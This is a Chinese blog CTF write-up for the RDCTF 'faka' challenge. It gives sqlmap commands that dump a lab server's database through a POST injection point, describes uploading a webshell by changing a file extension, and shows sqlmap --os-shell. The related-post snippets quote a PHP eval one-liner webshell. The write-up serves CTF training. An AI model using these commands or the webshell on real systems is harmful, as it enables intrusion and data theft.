RDCTF-faka

最新推荐文章于 2024-01-18 05:08:33 发布
最新推荐文章于 2024-01-18 05:08:33 发布
阅读量434 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50401030/article/details/108673418
版权

  • 进入题目找到注入点

在这里插入图片描述
找到注入的地方,发现购买那就是一个注入点
在这里插入图片描述
利用burp suite进行抓包
在这里插入图片描述
发现了一个能注入的点,利用post注入即可,先将代码压缩成一个文件然后再用sqlmap跑
在这里插入图片描述
在这里插入图片描述
接着利用sqlmap跑数据库

sqlmap -r F:\a.txt -D --tables faka

因为题目名字是faka所以跑faka的表
在这里插入图片描述

sqlmap -r F:\a.txt -D faka --tables

接着跑表
在这里插入图片描述

-r F:\a.txt -D faka -T ayangw_config --columns

再跑字段
在这里插入图片描述
(这里发现跑的太慢了,跑不出来。换一种跑的方式)
在这里插入图片描述

sqlmap -u "http://117.167.136.244:28087/ajax.php?act=selgo" --data "tyid=1" -D faka -T ayangw_config --dump

扫描网址发现有admin 的路口
在这里插入图片描述
利用刚刚的账号密码进入后台
在这里插入图片描述
找了很久发现只能从这里上传木马
在这里插入图片描述
将木马上传发现没有变化
在这里插入图片描述
利用图片找到上传的木马

发现没有变化,尝试着把前面的png改成php

发现上传成功,连接蚁剑即可。
在这里插入图片描述
找到flag
flag{ea21bf78-e02c-4cd0-b8a6-54969b708b96}

  • 在这里介绍一个简单的方法(直接利用sqlmap跑出来flag)

利用参数–os-shell 或者 --os-cmd 直接连接
在这里插入图片描述

sqlmap -u "http://117.167.136.244:28027/ajax.php?act=selgo" --data "tyid=1" --os-shell

发现直接连接了那个网址可以直接找到flag了
在这里插入图片描述
找到flag
在这里插入图片描述
简陋,勿喷!!!

haozhu945
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021-07-28 CTF Webbuuoj [网鼎杯 2020 半决赛]faka
LiNa_lInA_741的博客
07-28 958
CTF Web buu oj[网鼎杯 2020 半决赛]faka解题 [网鼎杯 2020 半决赛]faka 解题 不会写网站,做不了代码审计,就记录别人WP的解题思路,再回头来看 下载网站源代码,html/applilcation/admin,网站打开admin,跳到管理后台登录页面。 目录文件中有tk.sql文件,phpmyadmin先创建数据库,再导入tk.sql。 数据库打开表system_user,找到admin/md5后得密码 md5解密得到admin密码admincccbbb123 登
SQL注入学习-RDCTF靶机实战1
qq_46231152的博客
09-10 325
sqlmap的安装 1.获取sqlmap压缩包 2.解压后将其添加进入环境变量 3.打开命令行窗口输入sqlmap.py运行 sqlmap的使用 本次使用的命令 sqlmap.py -u {URL} //查看是否有注入点 sqlmap.py -u {URL} -dbs //爆数据库 sqlmap.py -u {URL} -D db --tables //爆数据表 sqlmap.py -u {URL} -D db -T table --columns //爆字段 sqlmap.py -u {URL} -D
RDCTF(web:mangzhu)
weixin_50401030的博客
09-25 188
1 进入网站 输入1 得到的是 输入2得到的是 从这里可以找到一个不同的地方,开始写python代码 import requests flag="" a = "Hello, glzjin wants a girlfriend." #成功后的显示 url = "http://localhost/index.php" #题目网址 for i in range(1,50): for j in range(1,128): #两个循环 payload = "if(a..
RDCTF SHIZHAN1
sweetie 的博客
09-14 172
RDCTF SHIZHAN1 拿到题目进入网站 加上robots.txt 按照提示加上/admins/ 登入之前拿到的密码 进入网站后台 寻找注入点 点击附件管理 上传附件 文件内容(一句话木马) 找到刚刚上传的软件 点击在新窗口打开 得到url 打开蚁剑 链接 看代码表示flag在home文件夹里面 双击flag 成功! ...
SQLMap实战——RDCTF靶机训练
qq_50647304的博客
09-12 309
rdctf的题目练习 开启环境进入靶机 找到注入点,用sqlmap测试能否注入: 跑完以后发现能注入,输入python sqlmap.py -u “url” --dbs 查询数据库: 选择数据库rjxy,输入python sqlmap.py -u “url” -D rjxy --tables 查询数据表: 选择manager表,输入 ...
acg-faka–功能丰富的发卡二次元商城源码
03-20
源码引见 支付系统,具有强悍的插件扩展才干,现目今曾经支持全网恣意平台,恣意支付渠道。 云更新,假设系统升级新版本,你无需中止繁琐操作,只需求在你的店铺后台就可以无缝完成升级。 商品销售,支持商品配图、...
代码审计faka2
m0_55772907的博客
05-02 1274
一、工具 seay源代码审计系统 二、漏洞 1、文件包含 主页index.php 没有过滤 gpc没有开启就可以本地包含,远程包含开启的话,直接可以写一个木马文件 在网站根目录新建一个phpinfo.php访问,在网址主页 http://www.faka.com/index.php?tp=default&action=../../phpinfo 解决办法:1、 2、开启gpc也可以 2、sql盲注注入 和首页的index.php在同一目录的ajax.php 可以
faka:这是一个faka回购
03-29
压缩包内的文件名为“faka-main”,可以推测这可能是一个主要的代码库或者项目的主目录。 在IT行业中,"回购"通常指的是企业或个人购买自己之前发行的股票或产品,但这与技术知识关联不大,可能是项目名称的创意...
Faka电影
02-17
在"Fake Movies"项目中,`<title>`标签用于设置网页的标题,可能显示为浏览器标签页上的"Faka电影"。`<head>`部分通常包含元信息,比如页面的字符编码,而`<body>`则包含用户可见的内容。 在创建电影相关的网页时,...
CTF实战(faka注入)
Marsper的博客
09-18 1314
CTF实战 SQL注入(faka) 方法一:蚁键注入 首先获取实战链接 访问链接打开,并按上篇文章所学寻找相关post提交处,设法找到注入点,如图,得知付款处即为post提交处 打开burp实行抓包,检测注入点是否正确 将注入点链接抛入sqlmap中寻找准确注入点,找出数据库,爆出后台管理员密码 输入sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dum
RDCTF-考核
qq_45970858的博客
09-23 353
复制网站并打开找到注入点 找到注入的地方,发现购买那里是一个注入点 此处可利用burp suite进行抓包 发现了一个能注入的点,利用post注入即可, 先将代码压缩成一个文件然后再用sqlmap跑 接着利用sqlmap跑数据库 python sqlmap.py -r c:\lyf\POST.txt -dbs 因为题目名字是faka所以跑faka的表 python sqlmap.py -r c:\lyf\POST.txt -D faka --tables 再跑字段 python sql
异次元发卡最新漏洞0day(XSS组合拳)
最新发布
白昼小丑的博客
01-18 1798
异次元商店头像上传处存在存储型XSS注入(user、admin均存在)。其中,user处有过滤,admin无。 将恶意脚本插入后,管理员访问用户管理页面即可执行恶意脚本。 恶意脚本执行后,会新增一个管理员用户,进而获得权限。鉴于漏洞还没有泛滥,而且很多站都有漏洞。EXP暂时不公开。需要学习可以加入知识星球
Web安全-用一句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 626
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
CTF实例题
A1956936030的博客
09-17 1336
1.靶机目标 http://117.167.136.244:28057 2.靶机为post请求即用burpsuite抓包 打开burpsuite 3.用burpsuite对靶机进行抓包 找到购买卡密 进行购买卡密 打开intercept 抓包成功 找到注入点如下http://117.167.136.244:28057/ajax.php?act=selgo 4.用sqlmap注入 (1)找库:sqlmap -u “http://117.167.136.244:28057/ajax.php?act
rdctf-shizhan1借助蚁剑注入木马找到flag
qq_45970858的博客
09-14 1546
rdctf-shizhan1 进入实战页面 复制链接打开新的页面,在后面输入admins/进入后台管理员页面 找到可以上传文件的地方,例如附件管理,上传文件 此时先需要把php开启 点击网站,打开根目录 点击新建,创建新的php文档 (一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然
CTF在线练习平台
weixin_41949487的博客
02-25 4411
CTF在线练习平台 IDF实验室: http://ctf.idf.cn/ XCTF_OJ竞赛平台:http://oj.xctf.org.cn/problem_archives 网络信息安全攻防学习平台:http://hackinglab.cn/ OWASP在线网络安全攻防实验室:http://www.owasp.org.cn/owasp-project/security-l...
[网鼎杯 2020 半决赛]faka
feng的博客
03-22 2268
前言 同样是nepctf,遇到了网鼎杯这题faka的加强版,考虑到实在太菜了,没参加过今年的网鼎杯,所以先去把网鼎杯的faka这题复现一下,源码可以很容易从网上找到。 WP 拿seay审了一下,基本上啥都没审出来啥,就审出来了一个最简单的那个任意读。不过这个任意读还需要登录,因此还需要利用其他的漏洞。 未授权添加账号和提升权限 漏洞代码位于application/admin/controller/Index.php中的info方法: public function info() {
入侵靶机之实战faka题目注入
weixin_50644728的博客
09-22 373
题目来源:rdctf:8000之faka 1.寻找网站注入点 刚拿到一个新网站,首先大概浏览网站页面内容,该网站比较简单,可点击的地方较少,在购买卡密的地方选择商品后。下面就自动弹出了价格和库存等信息,猜测这里应该跟数据库是有交互的。 2.利用burpsuite抓取数据包 找到了与数据库交互的地方之后,用burpsuite抓包获取网站和数据库之间交换的数据。首先要将burp的intercept处于off状态,回到网站将商品信息选择好后点击付款,但不进行支付。 然后将burp的intercept打开,在h
首届祥云杯网络安全大赛 web wp
Firebasky的博客
11-24 933
和团队一起打了祥云杯,感觉还是可以的,师傅们太强了~ 自己也学习了不少继续加油~ 链接:https://pan.baidu.com/s/1WKE8UhFaKajEuaIM772aRw 提取码:93um 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
检查优化这段php代码 $sql = "select * from faka where kami='qq11'"; $res = mysqli_query($conn, $sql); $row = mysqli_fetch_array($res); if (!is_null($row)) { print_r($row); }
03-14
这段 PHP 代码的问题在于它没有使用预处理语句,这会导致 SQL 注入攻击的风险。正确的做法是使用预处理语句来绑定参数,例如: $stmt = $conn->prepare("SELECT * FROM faka WHERE kami = ?"); $stmt->bind_param("s", $kami); $kami = "qq11"; $stmt->execute(); $result = $stmt->get_result(); $row = $result->fetch_assoc(); if (!is_null($row)) { print_r($row); }
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值